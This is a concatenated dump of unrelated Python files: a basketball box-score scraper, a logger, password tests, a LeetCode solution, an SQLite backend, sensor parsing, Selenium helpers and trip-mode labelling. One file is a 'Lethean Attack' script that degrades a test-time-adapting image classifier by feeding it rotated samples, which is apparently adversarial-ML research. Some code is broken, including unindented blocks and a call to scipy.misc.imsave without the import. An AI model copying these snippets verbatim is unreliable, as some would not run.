    """Scrape today's basketball-reference box-score index page and return the
    relative URL of every game's box-score page."""
    page = requests.get(nbaBoxUrl)
    soup = BeautifulSoup(page.content, 'html.parser')
    gameLinks = []
    # each game's "Final" cell carries the link to its box-score page
    data = soup.findAll('td', {'class': 'right gamelink'})
    for div in data:
        links = div.findAll('a')
        for a in links:
            gameLinks.append(a['href'])
    return gameLinks
def getBoxScoreTeams(soup):
    """Extract the two teams from a box-score page's scorebox.

    Returns a list of two dicts {'name', 'abrv', 'table', 'opponent'};
    'table' is left empty here and filled in by getGameBoxScore.
    """
    data = soup.find('div', {'class': 'scorebox'})
    substring = 'teams'
    teams = []
    team = {'name':'', 'abrv':'', 'table' : '', 'opponent' : ''}
    for a in data.find_all('a', href=True):
        if substring in a['href']:
            # team links look like /teams/<ABRV>/...
            new = team.copy()
            new['name'] = a.getText()
            new['abrv'] = a['href'].split('/')[2]
            teams.append(new)
    #set opponent
    for team in teams:
        for opponent in teams:
            if team['name'] != opponent['name']:
                team['opponent'] = opponent['name']
    return teams
def getGameDate(soup):
    """Return the game date as MM/DD/YYYY parsed from the scorebox metadata.

    NOTE(review): returns from inside the loop, so only the first
    scorebox_meta div is inspected -- presumably there is exactly one.
    """
    for div in soup.find_all('div', {'class': 'scorebox_meta'}):
        childdiv = div.find('div')
        #format date
        datetime_object = datetime.strptime(childdiv.string, '%I:%M %p, %B %d, %Y')
        return datetime_object.strftime("%m/%d/%Y")
def getHomeTeam(url):
    """Home-team abbreviation: the first run of letters in the final path
    segment (e.g. '202110250LAC.html' -> 'LAC')."""
    segment = url.split('/')[4]
    return re.findall("[a-zA-Z]+", segment)[0]
def getGameId(url):
    """Game id: the first run of digits in the final path segment
    (e.g. '202110250LAC.html' -> '202110250')."""
    segment = url.split('/')[4]
    return re.findall(r"\d+", segment)[0]
def getFileName(url):
    """Output file stem: the final path segment with its extension removed."""
    name = url.split('/')[4]
    base, dot, _ext = name.rpartition(".")
    # no dot at all -> keep the whole segment (matches rsplit('.', 1)[0])
    return base if dot else name
def removeSummaryRows(df):
    """Drop the 'Team Totals' and 'Reserves' summary rows from a box-score frame."""
    return df[~df.Starters.isin(['Team Totals', 'Reserves'])]
def updateColumns(df):
    """Drop the derived FG% column and rename Starters -> Players."""
    # BUG FIX: `df.drop('FG%', 1)` passed `axis` positionally, which was
    # deprecated in pandas 1.1 and removed in pandas 2.0 (TypeError).
    df = df.drop(columns='FG%')
    #rename
    df = df.rename({'Starters': 'Players'}, axis=1)
    return df
def replaceDNP(df):
    """Replace 'Did Not Play' placeholders with 0 so stat columns stay numeric."""
    return df.replace('Did Not Play', 0)
def orderColumns(df):
    """Reorder the frame into the canonical export column order."""
    ordered = ['Players', 'Team', 'Opponent', 'GameID', 'Date', 'Court',
               'MP', 'FG', 'FGA', '3P', '3PA', 'FT', 'FTA', 'ORB', 'DRB',
               'AST', 'STL', 'BLK', 'TOV', 'PF', 'PTS']
    return df[ordered]
def getGameBoxScore():
    """Scrape one game's basic box score into a tab-separated CSV file.

    NOTE(review): the URL is hard-coded to a sample game; presumably this is
    meant to iterate over getBoxScoreLinks() eventually (see the commented
    call at the bottom of the file).
    """
    url = 'https://www.basketball-reference.com/boxscores/202110250LAC.html'
    page = requests.get(url)
    soup = BeautifulSoup(page.content, 'html.parser')
    #get teams
    teams = getBoxScoreTeams(soup)
    gameDate = getGameDate(soup)
    homeTeam = getHomeTeam(url)
    gameId = getGameId(url)
    fileName = getFileName(url)
    #Remove extra header
    for div in soup.find_all("tr", {'class':'over_header'}):
        div.decompose()
    masterDf = pd.DataFrame()
    for team in teams:
        # per-team basic box-score table, e.g. id="box-LAC-game-basic"
        team['table'] = soup.find_all("table", {'id':'box-'+ team['abrv'] +'-game-basic'})
        #format dataframe
        df = pd.read_html(str(team['table']))[0]
        #constants
        df['Team'] = team['name']
        df['Opponent'] = team['opponent']
        df['Date'] = gameDate
        df['GameID'] = gameId
        if team['abrv'] == homeTeam:
            df['Court'] = 'Home'
        else:
            df['Court'] = 'Away'
        masterDf = pd.concat([masterDf, df], ignore_index=True)
        #master_df = master_df.append(df,ignore_index=True)
    #format dataframe
    masterDf = removeSummaryRows(masterDf)
    masterDf = replaceDNP(masterDf)
    masterDf = updateColumns(masterDf)
    masterDf = orderColumns(masterDf)
    print(masterDf.head(2))
    masterDf.to_csv(fileName + '.csv', index=False, sep='\t', encoding='utf-8')
    #add footer row
    with open(fileName + '.csv','a') as fd:
        fd.write('\n')
        fd.write('Sample Link:' + '\t' + url)
#gameLinks = getBoxScoreLinks()
getGameBoxScore()
|
4,819 | 0475c6cab353f0d23a4c4b7f78c1b47ecc5f8d3b | '''
log.py
version 1.0 - 18.03.2020
Logging fuer mehrere Szenarien
'''
# Imports
import datetime
# Globale Variablen
ERROR_FILE = "error.log"        # destination for error-level messages
LOG_FILE = "application.log"    # destination for informational messages
def error(msg):
    """Append msg to the error log."""
    __log_internal(ERROR_FILE, msg)
def info(msg):
    """Append msg to the application log."""
    __log_internal(LOG_FILE, msg)
def __log_internal(filename, msg):
    """Append a timestamped line to the given log file."""
    now = datetime.datetime.now()
    # BUG FIX: use a context manager so the handle is closed even when
    # write() raises (the original left the file open on failure).
    with open(filename, "a+") as f:
        f.write("{} : {}\n".format(now.strftime("%Y-%m-%d %H:%M:%S"), msg))
if __name__ == '__main__':
print("Erstelle Testfiles")
info("Test")
error("Test")
|
4,820 | dc7d75bf43f1ba55673a43f863dd08e99a1c0e0f | import unittest
from validate_pw_complexity import *
class Test_PW_Functions(unittest.TestCase):
    """Unit tests for validate_pw_long from validate_pw_complexity."""
    def test_pw_not_long_enough_min(self):
        # 4 characters: clearly below any minimum length
        sample_pass ="abcd"
        expected_result = False
        result = validate_pw_long(sample_pass)
        self.assertEqual(expected_result, result)
    def test_pw_just_long_enough_min(self):
        # NOTE(review): 8 characters but still expected False -- the minimum
        # enforced by validate_pw_long is presumably above 8; confirm.
        sample_pass = "abcdadca"
        expected_result = False
        result = validate_pw_long(sample_pass)
        self.assertEqual(expected_result, result)
    def test_pw_long_enough_min(self):
        # NOTE(review): name says "long enough" yet expects False -- verify
        # against the threshold in validate_pw_complexity.
        sample_pass = "abcdadcaabc"
        expected_result = False
        result = validate_pw_long(sample_pass)
        self.assertEqual(expected_result, result)
|
4,821 | ec9184fa3562ef6015801edf316faa0097d1eb57 | '''
236. Lowest Common Ancestor of a Binary Tree
https://leetcode.com/problems/lowest-common-ancestor-of-a-binary-tree/
Given a binary tree, find the lowest common ancestor (LCA) of two given nodes in the tree.
According to the definition of LCA on Wikipedia:
“The lowest common ancestor is defined between two nodes p and q as the lowest node in T that
has both p and q as descendants (where we allow a node to be a descendant of itself).”
Given the following binary tree: root = [3,5,1,6,2,0,8,null,null,7,4]
Example 1:
Input: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 1
Output: 3
Explanation: The LCA of nodes 5 and 1 is 3.
Example 2:
Input: root = [3,5,1,6,2,0,8,null,null,7,4], p = 5, q = 4
Output: 5
Explanation: The LCA of nodes 5 and 4 is 5, since a node can be a descendant of
itself according to the LCA definition.
Note:
All of the nodes' values will be unique.
p and q are different and both values will exist in the binary tree.
'''
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution:
    """Lowest common ancestor of two nodes via a single post-order walk."""

    def postorder(self, node: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':
        """Return p, q, or their LCA if found under `node`; otherwise None.

        Improvement idea: count how many targets were found to allow an
        early return once both are located.
        """
        if not node:
            return None
        if node == p or node == q:
            # node itself is p, q, or (if the other lies beneath it) the LCA
            return node
        left = self.postorder(node.left, p, q)
        right = self.postorder(node.right, p, q)
        if left and right:
            # p and q sit in different subtrees: node is their LCA
            return node
        # propagate whichever side found something (or None if neither did)
        return left or right

    def lowestCommonAncestor(self, root: 'TreeNode', p: 'TreeNode', q: 'TreeNode') -> 'TreeNode':
        return self.postorder(root, p, q)
|
4,822 | 191a57d3f13fcbe217ff6d0bd92dea163d5fb3cf | import re
from typing import Any, Dict, List
import aiosqlite
from migri.elements import Query
from migri.interfaces import ConnectionBackend, TransactionBackend
class SQLiteConnection(ConnectionBackend):
    """migri connection backend for SQLite, built on aiosqlite."""
    _dialect = "sqlite"
    @staticmethod
    def _compile(query: Query) -> dict:
        """Translate a Query using $name placeholders into a qmark-style
        statement plus an ordered value list for sqlite3."""
        q = query.statement
        v = []
        if query.placeholders:
            for p in query.placeholders:
                # Append value
                v.append(query.values[p.replace("$", "")])
                # Substitute
                q = re.sub(f"\\{p}", "?", q)
        return {"query": q, "values": v}
    async def connect(self):
        # self.db_name is presumably provided by ConnectionBackend -- confirm
        self.db = await aiosqlite.connect(self.db_name)
        self.db.row_factory = aiosqlite.Row
    async def disconnect(self):
        await self.db.close()
    async def execute(self, query: Query):
        """Run a statement without fetching results."""
        q = self._compile(query)
        await self.db.execute(q["query"], q["values"])
    async def fetch(self, query: Query) -> Dict[str, Any]:
        """Run a statement and return the first row as a dict.

        NOTE(review): raises TypeError when the query yields no rows
        (dict(None)) -- confirm callers guarantee a result.
        """
        q = self._compile(query)
        cursor = await self.db.execute(q["query"], q["values"])
        res = await cursor.fetchone()
        await cursor.close()
        return dict(res)
    async def fetch_all(self, query: Query) -> List[Dict[str, Any]]:
        """Run a statement and return every row as a dict."""
        q = self._compile(query)
        cursor = await self.db.execute(q["query"], q["values"])
        res = await cursor.fetchall()
        await cursor.close()
        return [dict(r) for r in res]
    def transaction(self) -> "TransactionBackend":
        return SQLiteTransaction(self)
class SQLiteTransaction(TransactionBackend):
    """Transaction wrapper for SQLiteConnection.

    sqlite (via aiosqlite) opens transactions implicitly on the first write,
    so start() has nothing to do; commit/rollback delegate to the connection.

    NOTE(review): these methods use `self._connection.database`, while
    SQLiteConnection.connect() stores the handle as `self.db` - presumably
    `database` is a property on the ConnectionBackend base that exposes the
    same object; confirm, otherwise this is an AttributeError at runtime.
    """

    async def start(self):
        # Nothing to do - sqlite begins the transaction implicitly.
        return

    async def commit(self):
        await self._connection.database.commit()

    async def rollback(self):
        await self._connection.database.rollback()
|
4,823 | b8c7aa5ff7387eacb45d996fa47186d193b44782 | import re
def find_all_links(text):
    """Return every http/https URL-shaped substring found in *text*.

    The pattern matches an optional "www." host prefix followed by a
    simple "word.word" domain; matches are returned in order of appearance.
    """
    url_pattern = r"https?\:\/\/(www)?\.?\w+\.\w+"
    return [hit.group() for hit in re.finditer(url_pattern, text)]
4,824 | a1b579494d20e8b8a26f7636ebd444252d2aa250 | # Parsing the raw.csv generated by running lis2dh_cluster.py
# Standard gravity in m/s^2 (LIS2DH samples are expressed in g units).
# NOTE(review): not referenced in the code below - kept for callers/history.
g = 9.806
def twos_complement(lsb, msb):
    """Combine one little-endian LIS2DH sample (lsb, msb) into a signed int.

    The raw 16-bit value is a left-justified 10-bit two's-complement
    number; the final >> 6 removes the justification (Python's right
    shift is arithmetic, so the sign is preserved).
    """
    negative = bool(msb & 0b10000000)      # sign bit is the MSB
    magnitude = ((msb & 0x7F) << 8) + lsb  # 15-bit magnitude without sign
    if negative:
        value = -1 - (magnitude ^ 0x7FFF)  # undo two's complement manually
    else:
        value = magnitude
    return value >> 6
# Parse raw.csv (semicolon-separated: timestamp; "[lsb,msb,...]" per sensor)
# into parsed.csv with one comma-separated column per axis.
import ast

offset = 'not_set'
with open('raw.csv', 'r') as infile:
    with open('parsed.csv', 'a') as outfile:
        # Read the first line (the column headers): 't' stays as-is, every
        # accelerometer column expands into x/y/z component columns.
        headers = infile.readline().strip('\n\r')
        headers = headers.split(';')
        newheaders = []
        for header in headers:
            if header == 't':
                newheaders += ['t']
            else:
                newheaders += [header + 'x', header + 'y', header + 'z']
        outfile.write(','.join(newheaders) + '\n')
        # Read and parse all sequential lines; as before, stop at the first
        # blank line (treated as end of data).
        for raw_line in infile:
            line_in = raw_line.strip('\n\r')
            if not line_in:
                break
            data = line_in.split(';')
            # FIX: ast.literal_eval instead of eval - identical result for
            # the numeric/list literals this file contains, but it cannot
            # execute arbitrary code from a malformed/hostile csv.
            timestamp = ast.literal_eval(data[0])
            if offset == 'not_set':
                offset = timestamp  # first timestamp becomes t = 0
            fields = [str(timestamp - offset)]
            for accel in data[1:]:
                sample = ast.literal_eval(accel)  # e.g. "[lsb, msb, lsb, msb, lsb, msb]"
                fields.append(str(twos_complement(sample[0], sample[1])))
                fields.append(str(twos_complement(sample[2], sample[3])))
                fields.append(str(twos_complement(sample[4], sample[5])))
            outfile.write(','.join(fields) + '\n')
        # FIX: the original wrapped readline() in a bare `try/except: pass`,
        # which could loop forever on a persistent read error; plain file
        # iteration has the same success-path behaviour without that risk.
4,825 | 97656bca3ce0085fb2f1167d37485fb7ee812730 | ##class Human:
## pass
##hb1-HB("Sudhir")
##hb2=HB("Sreenu")
class Student:
    """Simple record pairing a student's name with a roll number."""

    def __init__(self, name, rollno):
        # store the constructor arguments as public attributes
        self.name = name
        self.rollno = rollno


# Demo instance, kept from the original script.
std1 = Student("Siva", 123)
|
4,826 | 1f345a20343eb859cb37bf406623c0fc10722357 | from __future__ import print_function
import argparse
import torch
import torch.nn as nn
import torch.optim as optim
import random
from utils.misc import *
from utils.adapt_helpers import *
from utils.rotation import rotate_batch, rotate_single_with_label
from utils.model import resnet18
from utils.train_helpers import normalize, te_transforms
from utils.test_helpers import test
# Run on GPU when available; CIFAR-10 class names for reference.
device = 'cuda' if torch.cuda.is_available() else 'cpu'
classes = ('plane', 'car', 'bird', 'cat',
           'deer', 'dog', 'frog', 'horse', 'ship', 'truck')

# Command-line interface (defaults target CIFAR-10-C experiments).
parser = argparse.ArgumentParser()
parser.add_argument('--dataroot', default='data/CIFAR-10-C/')
parser.add_argument('--shared', default=None)
########################################################################
# model / data-loader parameters
parser.add_argument('--depth', default=18, type=int)
parser.add_argument('--group_norm', default=32, type=int)
parser.add_argument('--batch_size', default=32, type=int)
parser.add_argument('--workers', default=8, type=int)
########################################################################
# adaptation / attack parameters
parser.add_argument('--lr', default=0.001, type=float)
parser.add_argument('--niter', default=1, type=int)
parser.add_argument('--online', action='store_true')
parser.add_argument('--shuffle', action='store_true')
parser.add_argument('--threshold', default=1, type=float)
parser.add_argument('--epsilon', default=0.2, type=float)
parser.add_argument('--dset_size', default=0, type=int)
########################################################################
# checkpoint / output locations
parser.add_argument('--resume', default=None)
parser.add_argument('--outf', default='.')
parser.add_argument('--epochs', default=10, type=int)
args = parser.parse_args()
args.threshold += 0.001 # to correct for numeric errors
my_makedir(args.outf)
# Enable cuDNN autotuning (input sizes are fixed, so this is a free speedup).
import torch.backends.cudnn as cudnn
cudnn.benchmark = True
def gn_helper(planes):
    """norm_layer factory for resnet18: GroupNorm with args.group_norm groups."""
    return nn.GroupNorm(args.group_norm, planes)
# Passed into resnet18 below so every norm layer is GroupNorm, not BatchNorm.
norm_layer = gn_helper
# Build the network, wrap for multi-GPU, and restore the pretrained weights.
net = resnet18(num_classes = 10, norm_layer=norm_layer).to(device)
net = torch.nn.DataParallel(net)
print('Resuming from %s...' %(args.resume))
ckpt = torch.load('%s/best.pth' %(args.resume))
net.load_state_dict(ckpt['net'])
print("Starting Test Error: %.3f" % ckpt['err_cls'])
criterion = nn.CrossEntropyLoss().to(device)
optimizer = optim.SGD(net.parameters(), lr=args.lr)
trset, trloader = prepare_train_data(args)
teset, teloader = prepare_test_data(args)
# Lethean attack: repeatedly adapt the model on a randomly rotated sample,
# then measure how far the test error has drifted.
print("Lethean Attack")
for i in range(args.epochs):
    idx = random.randint(0, len(trset) - 1)
    img, lbl = trset[idx]
    # rotation label in {1, 2, 3} = 90/180/270 degrees (0 would be identity)
    random_rot = random.randint(1, 3)
    rot_img = rotate_single_with_label(img, random_rot)
    adapt_single_tensor(net, rot_img, optimizer, criterion, args.niter, args.batch_size)
    if i % 50 == 49:
        # NOTE(review): progress assumes 5000 iterations, but --epochs
        # defaults to 10 - percentage is misleading unless --epochs 5000.
        print("%d%%" % ((i + 1) * 100 / 5000))
    err_cls, correct_per_cls, total_per_cls = test(teloader, net, verbose=True, print_freq=0)
    print("Epoch %d Test error: %.3f" % (i, err_cls))
|
4,827 | c8137aacfb0f35c9630515442d5bdda870e9908a | # Getting familiar with OOP and using Functions and Classes :)
class Dog():
    """Toy class demonstrating class vs. instance attributes and methods."""

    # class attribute, shared by every Dog instance
    species = 'mammal'

    def __init__(self, breed, name):
        # per-instance attributes supplied by the caller
        self.breed = breed
        self.name = name

    def bark(self, number):
        """Print a greeting combining instance state with a caller argument."""
        print(f'Woof! My name is {self.name} and the number is {number}')
# Exercise the Dog class defined above.
my_dog = Dog('Corgi','RTZY')
print(type(my_dog))   # shows the instance's class
print(my_dog.breed)
print(my_dog.name)
my_dog.bark(10)
class Circle():
    """Circle with a radius, a precomputed area and a circumference helper."""

    # shared, rough approximation of pi
    pi = 3.14

    def __init__(self, radius=1):
        self.radius = radius
        # area is computed once, at construction time
        self.area = Circle.pi * (radius * radius)

    def get_circumference(self):
        """Return 2 * pi * r using the class-level pi constant."""
        return 2 * (self.radius * Circle.pi)
# Exercise the Circle class defined above.
my_circle = Circle(30)
print(my_circle.area)
test = my_circle.get_circumference()
print(test)
class Animal():
    """Base class for the inheritance demo; every method just prints."""

    def __init__(self):
        print('Animal Created')

    def who_am_i(self):
        """Announce the animal (prints, returns None)."""
        print('I am an animal')

    def eat(self):
        """Announce eating (prints, returns None)."""
        print('I am eating')
# Print a blank line between the two demo sections.
# NOTE(review): the original indentation was lost; this could have lived at
# module level or inside a class body - module level assumed here.
print('\n')
class Dog(Animal):
    """Subclass demo: chains to the parent initializer and adds bark()."""

    def __init__(self):
        # run the parent initializer first (prints 'Animal Created')
        Animal.__init__(self)
        print('Dog Created')

    def bark(self):
        """Print the dog's sound (returns None)."""
        print('Woof! Woof!')
mydog = Dog()
# bark() prints and returns None, so this prints 'Woof! Woof!' then 'None'.
print(mydog.bark())
4,828 | 6bb7dafea73aff7aca9b0ddc1393e4db6fcf0151 | import numpy as np
#1
def longest_substring(string1, string2):
    """Return the longest common contiguous substring of the two inputs.

    Classic dynamic program: dp[i, j] holds the length of the common
    suffix of string1[:i+1] and string2[:j+1].  Ties are broken by the
    first maximum in row-major order (np.argmax), and '' is returned
    when the strings share no characters.
    """
    dp = np.zeros((len(string1), len(string2)))
    for i, ch1 in enumerate(string1):
        for j, ch2 in enumerate(string2):
            if ch1 == ch2:
                # extend the diagonal run, or start one on the borders
                dp[i, j] = 1 if (i == 0 or j == 0) else dp[i - 1, j - 1] + 1
    end_row = np.unravel_index(np.argmax(dp), dp.shape)[0]
    length = int(dp.max())
    # slice the winning run out of string1 (it ends at end_row, inclusive)
    return string1[end_row - length + 1:end_row + 1]
if __name__ == '__main__':
    # Smoke tests: expected values are the known longest common substrings.
    assert longest_substring("jsanad","anasc") == "ana"
    assert longest_substring("ilovebioinformatics","icantwaitformax") == "forma"
    assert longest_substring("ironmansaregreat","triathlonforever") == "on"
    assert longest_substring("ihatewalking","nobikenolife") == "i"
    assert longest_substring("gofaster","govegan") == "go"
|
4,829 | d8da01433b2e6adb403fdadc713d4ee30e92c787 | from application.identifier import Identifier
if __name__ == '__main__':
    # Interactive loop: press enter to run one guess, 'q' to quit.
    idf = Identifier()
    # NOTE(review): raw_input is Python 2 only - under Python 3 this must be
    # input(); left unchanged because the project appears to target Py2.
    while raw_input('Hello!, to start listening press enter, to exit press q\n') != 'q':
        idf.guess()
|
4,830 | a2aa615ac660f13727a97cdd2feaca8f6e457da4 | #!/usr/bin/env python
from application import app
import pprint
import sys
# Path prefix prepended to SCRIPT_NAME by ScriptNameEdit below (the app is
# served under this path behind the front-end proxy).
URL_PREFIX = '/pub/livemap'
class LoggingMiddleware(object):
    """WSGI middleware that pretty-prints every request environ plus the
    response status/headers to the request's wsgi.errors stream."""

    def __init__(self, app):
        self._app = app

    def __call__(self, environ, resp):
        err_stream = environ['wsgi.errors']
        pprint.pprint(('REQUEST', environ), stream=err_stream)

        def traced_start_response(status, headers, *args):
            # log the response line before delegating to the real callable
            pprint.pprint(('RESPONSE', status, headers), stream=err_stream)
            return resp(status, headers, *args)

        return self._app(environ, traced_start_response)
class ScriptNameEdit(object):
    """WSGI middleware that forces the https scheme and prefixes
    SCRIPT_NAME with URL_PREFIX (the proxy-visible mount point)."""

    def __init__(self, app):
        self.app = app

    def __call__(self, environ, start_response):
        original_name = environ['SCRIPT_NAME']
        environ['wsgi.url_scheme'] = 'https'
        environ['SCRIPT_NAME'] = URL_PREFIX + original_name
        return self.app(environ, start_response)
# '-l' presumably means "local run": skip the proxy-path rewriting then.
if '-l' not in sys.argv:
    # app.wsgi_app = LoggingMiddleware(app.wsgi_app)
    app.wsgi_app = ScriptNameEdit(app.wsgi_app)
# Name expected by WSGI servers (mod_wsgi/gunicorn).
application = app
if __name__ == "__main__":
    app.run(host='0.0.0.0', threaded=True)
|
4,831 | 371c1c9e3ccf7dae35d435bdb013e0462f3add5d | from PIL import Image, ImageFilter
import numpy as np
import glob
from numpy import array
import matplotlib.pyplot as plt
from skimage import morphology
import scipy.ndimage
def sample_stack(stack, rows=2, cols=2, start_with=0, show_every=1, display1 = True):
    """Show slices of *stack* in a rows x cols matplotlib grid.

    With display1=True (default) *stack* is treated as a single image:
    it is wrapped four times and the function recurses into the grid
    branch, which then shows the same image in all four cells.
    NOTE(review): in grid mode each cell shows stack[ind] with
    ind = start_with + i*show_every - confirm stack is indexable that far.
    """
    if (display1):
        # Single-image mode: duplicate the image so the grid branch below
        # has one entry per cell, then recurse with display1=False.
        new_list = []
        new_list.append(stack)
        new_list.append(stack)
        new_list.append(stack)
        new_list.append(stack)
        sample_stack(new_list, 2, 2, 0, 1, False)
    else:
        fig,ax = plt.subplots(rows,cols,figsize=[12,12])
        for i in range((rows*cols)):
            ind = start_with + i*show_every
            # map the flat counter i onto the 2-D axes grid
            ax[int(i/rows),int(i % rows)].set_title('slice %d' % ind)
            ax[int(i/rows),int(i % rows)].imshow(stack[ind],cmap='gray')
            ax[int(i/rows),int(i % rows)].axis('off')
        plt.show()
"""
datapath = "jpg_images/"
img0 = Image.open("jpg_images/maskedimage" + str(0) + ".jpg")
counter = 0
img1 = []
for f in glob.glob('/Users/paulmccabe/Desktop/jpg images/*.jpg'):
path = "jpg_images/maskedimage" + str(counter) + ".jpg"
img0 = Image.open(path).convert('L')
img1.append(array(img0))
counter += 1
print("Counter: " + str(counter))
imgs_to_process_orig = np.stack([s for s in img1])
"""
# Load the saved binary mask volume, dump it as jpgs, then compute dilated
# edge maps and save them back as a numpy volume.
# NOTE(review): `id` and (below) `list` shadow Python builtins.
id = 2
imgs = np.load("/Users/paulmccabe/Desktop/Segmentation Project/" + "justmask_%d.npy" % (id))
counter = 0
print("Saving as jpg Images...")
for img in imgs:
    # NOTE(review): only scipy.ndimage is imported above, and
    # scipy.misc.imsave was removed in SciPy >= 1.2 - this line likely
    # fails at runtime (imageio.imwrite is the usual replacement).
    scipy.misc.imsave('/Users/paulmccabe/Desktop/Segmentation Project' + '/jpg mask images/justmask{}.jpg'.format(counter), img)
    counter += 1
counter = 0
#print("Re-Importing jpg Images...")
#for f in glob.glob('/Users/paulmccabe/Desktop/Segmentation Project/jpg mask images/*.jpg'):
#    path = "jpg_images/maskedimage" + str(counter) + ".jpg"
#    img0 = Image.open(path).convert('L')
#    img1.append(array(img0))
#    counter += 1
# Promote the 0/1 mask to 0/255 so PIL's edge filter has real contrast.
imgs[imgs == 1] = 255
list = []
for img in imgs:
    # find mask outlines with PIL, then thicken them with a 4x4 dilation
    PIL_img = Image.fromarray(img.astype('uint8'))
    PIL_edge = PIL_img.filter(ImageFilter.FIND_EDGES)
    np_img = array(PIL_edge)
    dilation = morphology.dilation(np_img, np.ones([4,4]))
    list.append(dilation)
imgs_after_processing = np.stack([s for s in list])
# NOTE(review): the slice [:284] caps the number of saved slices - confirm
# this matches the expected volume depth.
np.save("/Users/paulmccabe/Desktop/Segmentation Project" + "/justedge_%d.npy" % (id), imgs_after_processing[:284])
#sample_stack(np_img)
4,832 | 0a23b16329d8b599a4ee533604d316bdfe4b579a | from selenium.webdriver.common.keys import Keys
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
# driver = webdriver.Chrome('C:/automation/chromedriver')
# wait = WebDriverWait(driver, 15)
class Methodos(object):
    """Thin wrapper around common Selenium actions with explicit waits."""

    def __init__(self, driver):
        self.driver = driver
        # single explicit-wait helper reused by every action (15 s timeout)
        self.wait = WebDriverWait(self.driver, 15)

    def SendText(self, _id, text):
        """Wait for the element with id *_id* to be clickable, clear it and type *text*."""
        # BUG FIX: element_to_be_clickable takes ONE locator tuple
        # (By.ID, _id); the original passed two positional arguments,
        # which raises TypeError at runtime.
        e = self.wait.until(EC.element_to_be_clickable((By.ID, _id)))
        e.clear()
        e.send_keys(text)
        self.driver.implicitly_wait(5)

    def Click(self, id):
        """Wait for the element with the given id and click it."""
        e = self.wait.until(EC.element_to_be_clickable((By.ID, id)))
        e.click()

    def GetElementId(self, idtext):
        """Return the element with id *idtext* once it is clickable."""
        # BUG FIX: same locator-tuple fix as in SendText.
        return self.wait.until(EC.element_to_be_clickable((By.ID, idtext)))
# def SendText(driver,wait,_id,text):
# e= wait.until(EC.element_to_be_clickable(By.ID,_id))
# e.clear()
# e.send_keys(text)
# driver.implicitly_wait(5)
# def Click(driver,wait,id):
# e=wait.until(EC.element_to_be_clickable((By.ID,id)))
# e.click()
|
4,833 | 3f4e8402bbd096a33ed159ca0fed250c74c2f876 | def label_modes(trip_list, silent=True):
"""Labels trip segments by likely mode of travel.
Labels are "chilling" if traveler is stationary, "walking" if slow,
"driving" if fast, and "bogus" if too fast to be real.
trip_list [list]: a list of dicts in JSON format.
silent [bool]: if True, does not print reports.
Returns list of dicts in JSON format."""
if silent == False:
print('Preparing to label modes of travel for ' \
+ str(len(trip_list)) + ' trips.')
loop_counter = 0
loop_size = len(trip_list)
for doc in trip_list:
if silent == False:
loop_counter = loop_counter + 1
if loop_counter % 10000 == 0:
print('Labeling modes. Finished ' + str(loop_counter) \
+ ' trips.')
time_spent_driving = 0
time_spent_walking = 0
time_spent_chilling = 0
time_spent_bogus = 0
for i in range(1,len(doc['reduction'])):
if (float(doc['reduction'][i]['velocity']) >= 2.3):
doc['reduction'][i]['mode'] = 'driving'
elif (float(doc['reduction'][i]['velocity']) < 2.3 and float(doc['reduction'][i]['velocity']) > 0):
doc['reduction'][i]['mode'] = 'walking'
elif (float(doc['reduction'][i]['velocity']) == 0.0):
doc['reduction'][i]['mode'] = 'chilling'
if (float(doc['reduction'][i]['velocity']) > 22.22):
doc['reduction'][i]['mode'] = 'bogus'
for i in range(1,len(doc['reduction']) - 1):
path_length = 0
if (doc['reduction'][i]['mode'] == 'driving'):
for j in range(i+1,len(doc['reduction'])):
last_intersection_id = doc['reduction'][j]['IntersectionID']
if (doc['reduction'][j]['mode'] == 'walking'): path_length = path_length + 1
elif (doc['reduction'][j]['mode'] == 'driving' or doc['reduction'][j]['mode'] == 'bogus'): break
if (path_length > 5 or last_intersection_id == doc['reduction'][i]['IntersectionID']):
for k in range(i+1,j):
if (doc['reduction'][k]['mode'] != 'chilling'): doc['reduction'][k]['mode'] = 'walking'
else :
for k in range(i+1,j):
if (doc['reduction'][k]['mode'] != 'chilling'): doc['reduction'][k]['mode'] = 'driving'
if (doc['reduction'][i]['mode'] == 'driving'): time_spent_driving = time_spent_driving + float(doc['reduction'][i]['time']) - float(doc['reduction'][i-1]['time'])
elif (doc['reduction'][i]['mode'] == 'walking'): time_spent_walking = time_spent_walking + float(doc['reduction'][i]['time']) - float(doc['reduction'][i-1]['time'])
elif (doc['reduction'][i]['mode'] == 'chilling'): time_spent_chilling = time_spent_chilling + float(doc['reduction'][i]['time']) - float(doc['reduction'][i-1]['time'])
elif (doc['reduction'][i]['mode'] == 'bogus'): time_spent_bogus = time_spent_bogus + float(doc['reduction'][i]['time']) - float(doc['reduction'][i-1]['time'])
if (doc['reduction'][-1]['mode'] == 'driving'): time_spent_driving = time_spent_driving + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time'])
elif (doc['reduction'][-1]['mode'] == 'walking'): time_spent_walking = time_spent_walking + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time'])
elif (doc['reduction'][-1]['mode'] == 'chilling'): time_spent_chilling = time_spent_chilling + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time'])
elif (doc['reduction'][-1]['mode'] == 'bogus'): time_spent_bogus = time_spent_bogus + float(doc['reduction'][-1]['time']) - float(doc['reduction'][-2]['time'])
duration_of_trip = float(doc['duration_of_trip'])
doc['time_percentage_driving'] = str(time_spent_driving/duration_of_trip*100)
doc['time_percentage_walking'] = str(time_spent_walking/duration_of_trip*100)
doc['time_percentage_chilling'] = str(time_spent_chilling/duration_of_trip*100)
doc['time_percentage_bogus'] = str(time_spent_bogus/duration_of_trip*100)
if silent == False:
print('Done labeling mode of travel. Returning list of length ' \
+ str(len(trip_list)) + '.')
return trip_list |
4,834 | 1f7007fcea490a8b28bd72163f99b32e81308878 | # -*- coding: utf-8 -*-
"""
Created on Wed Mar 22 19:29:50 2017
@author: marcos
"""
from sklearn.cluster import KMeans
from sklearn.utils import shuffle
from classes.imagem import Imagem
import numpy as np
def mudaCor(img, metodo='average', nTons=256):
    """Return a recolored copy of *img*.

    metodo selects the transform: 'average' -> grayscale from the channel
    mean, 'r' -> red channel replicated to all channels, 'inv' -> color
    negative, anything else -> unchanged copy.  nTons is accepted for
    interface compatibility but is not used here.
    """
    saida = Imagem((img.altura, img.largura))
